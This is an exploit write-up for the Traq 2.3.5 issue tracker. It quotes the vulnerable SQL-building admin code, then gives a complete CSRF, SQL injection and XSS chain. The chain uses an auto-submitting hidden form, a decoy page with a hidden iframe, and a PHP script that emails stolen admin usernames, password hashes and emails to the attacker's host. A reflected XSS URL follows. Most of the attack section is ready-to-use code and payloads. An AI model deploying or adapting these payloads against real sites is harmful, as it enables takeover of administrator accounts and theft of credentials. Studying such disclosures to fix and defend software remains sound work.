1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222 | ====================================================================
Vulnerable Software: traq-2.3.5
Official Site: TraqProject.org
====================================================================
About Software:
Traq is a PHP powered project manager, capable of tracking issues for multiple projects
with multiple milestones.
====================================================================
Tested on:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
MYSQL: 5.5.25
*/
====================================================================
Vuln Desc:
traq-2.3.5 is prone to: CSRF,XSS,SQL injection vulns.
[+] LESSON NUMBER 1:VULN IS VULN. IT DOESN'T MATTER WHERE IT EXISTS.
====================================================================
I noticed many developers,coders,admins,webmaster always thinks:
"If you find vuln(s) in administration section you can't exploit it.
You need to login to administration section to exploit it.Bla bla bla."
=======I HOPE THIS will be LESSON FOR ALL WHO THINKS LIKE BOTTOM=========
Vulnerable code section:
//admincp/groups.php
====================================================================
// Create
if(@$_POST['action'] == 'create')
{
// Check for errors
if(empty($_POST['values']['name']))
$errors['name'] = l('error_name_empty');
if(!count($errors))
{
// Sort columns from values
$keys = array();
$values = array();
foreach($_POST['values'] as $key => $val)
{
$keys[] = $key;
$values[] = "'".$val."'";
}
$db->query("INSERT INTO ".DBPF."usergroups (".implode(',',$keys).") VALUES(".implode(',',$values).")");
header("Location: groups.php?created");
}
$group = $_POST['values'];
}
// Save Usergroup
if(@$_POST['action'] == 'save')
{
// Check for errors
if(empty($_POST['values']['name']))
$errors['name'] = l('error_name_empty');
if(!count($errors))
{
// Make the query.
$query = array();
foreach($_POST['values'] as $key => $val)
$query[] = $key."='".$val."'";
// Run the query.
$db->query("UPDATE ".DBPF."usergroups SET ".implode(', ',$query)." WHERE id='".$db->res($_REQUEST['edit'])."' LIMIT 1");
header("Location: groups.php?saved");
}
}
====================================================================
We'll exploit 3 vulns together:
CSRF+SQL INJECTION+XSS
As result we will steal admin credentials(login:password:email) from database.
Payload:
mysql> select 0x41646D696E6973747261746F72733C2F613E3C696D67207372633D22687474703A2F2F3139322E3136382E302E31352F6C6561726E2F747261
666669632E7068703F67657470776E65643D \G
*************************** 1. row ***************************
0x41646D696E6973747261746F72733C2F613E3C696D67207372633D22687474703A2F2F3139322E3136382E302E31352F6C6561726E2F747261666669632E7068
703F67657470776E65643D: Administrators</a><img src="http://192.168.0.15/learn/traffic.php?getpwned=
1 row in set (0.00 sec)
mysql> select 0x22206865696774683D302077696474683D30202F3E \G
*************************** 1. row ***************************
0x22206865696774683D302077696474683D30202F3E: " heigth=0 width=0 />
1 row in set (0.00 sec)
//Our "Cookie Stealer" (In this case it is our credentials stealer *aka snifer*)
//traffic.php
==================BEGIN TRAFFIC.PHP===============
<?php
error_reporting(0);
if (isset($_GET['getpwned']))
{
$nastycookies=htmlentities(str_ireplace('\'','',$_GET['getpwned']));//some bugfixes to get rid single quote xD//
$sendto='noscriptkidding_please_IT_IS_ONLY_FOR_EDUCATIONAL_PURPOSES@mustdiehacker';//your mail address.
@mail($sendto,'Your nAsty cookies',PHP_EOL .$nastycookies);//sending mail to you//
}
?>
================ EOF TRAFFIC.HTML=================
================ EOF PAGE1.HTML================
<!DOCTYPE HTML>
<html>
<head>
<title></title>
<style type="text/css">
body
{
background-color:black;
color:red;
}
img
{
position:absolute;
top:20px;
}
iframe
{
position:absolute;
background-color:black;
color:black;
visibility:hidden;
}
</style>
</head>
<body>
<img src="#" /><br>
<iframe src="CSRF_SQL_INJ_XSS_TRAQ.html" />
</body>
</html>
================ EOF PAGE1.HTML================
============BEGIN CSRF_SQL_INJ_XSS_TRAQ.html====================
<body onload="javascript:document.forms[0].submit()">
<form name="pwn" action="http://====>CHANGE HERE<======/admincp/groups.php?edit=1" method="post">
<input type="hidden" name="action" value="save" />
<input type="text" name="values[name]" value="1',name=(select concat(0x41646D696E6973747261746F72733C2F613E3C696D67207372633D22687474703A2F2F3139322E3136382E302E31352F6C6561726E2F747261666669632E7068703F67657470776E65643D,username,0x7c,password,0x7c,email,0x22206865696774683D302077696474683D30202F3E) from traq_users where group_id=1),is_admin='1" />
<input type="radio" name="values[is_admin]" value="1" id="is_admin_yes" checked="checked" />
<input type="radio" name="values[is_admin]" value="0" id="is_admin_no" />
<input type="radio" name="values[create_tickets]" value="1" id="create_tickets_yes" />
<input type="radio" name="values[create_tickets]" value="0" id="create_tickets_no" checked="checked" />
<input type="radio" name="values[update_tickets]" value="1" id="update_tickets_yes" />
<input type="radio" name="values[update_tickets]" value="0" id="update_tickets_no" checked="checked" />
<input type="radio" name="values[comment_tickets]" value="1" id="comment_tickets_yes" />
<input type="radio" name="values[comment_tickets]" value="0" id="comment_tickets_no" checked="checked" />
<input type="radio" name="values[delete_tickets]" value="1" id="delete_tickets_yes" />
<input type="radio" name="values[delete_tickets]" value="0" id="delete_tickets_no" checked="checked" />
<input type="radio" name="values[add_attachments]" value="1" id="add_attachments_yes" />
<input type="radio" name="values[add_attachments]" value="0" id="add_attachments_no" checked="checked" />
</form>
============EOF CSRF_SQL_INJ_XSS_TRAQ.html====================
If your attack was successfull against victim you will receive admin credentials like below:
admin|d033e22ae348aeb5660fc2140aec35850c4da997|admin@localhost.tld
@Print screen successfull attack result (@mail'ed credentials to attacker)
http://s018.radikal.ru/i516/1206/14/85c6beab9a42.png
XSS via $_GET:
http://192.168.0.15/learn/traq/upload/admincp/plugins.php?edit&plugin=1"/><script>alert(1);</script>
[+] LESSON NUMBER 2: Do not trust to client side.Sanitize and validate it.
=====================THE END=================================
+++++++++My Special thanks to:+++++++++++++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
++++++++++++++++++++++++++++++++++++++++++++++++
Respect && Thank you.
/AkaStep ^_^
|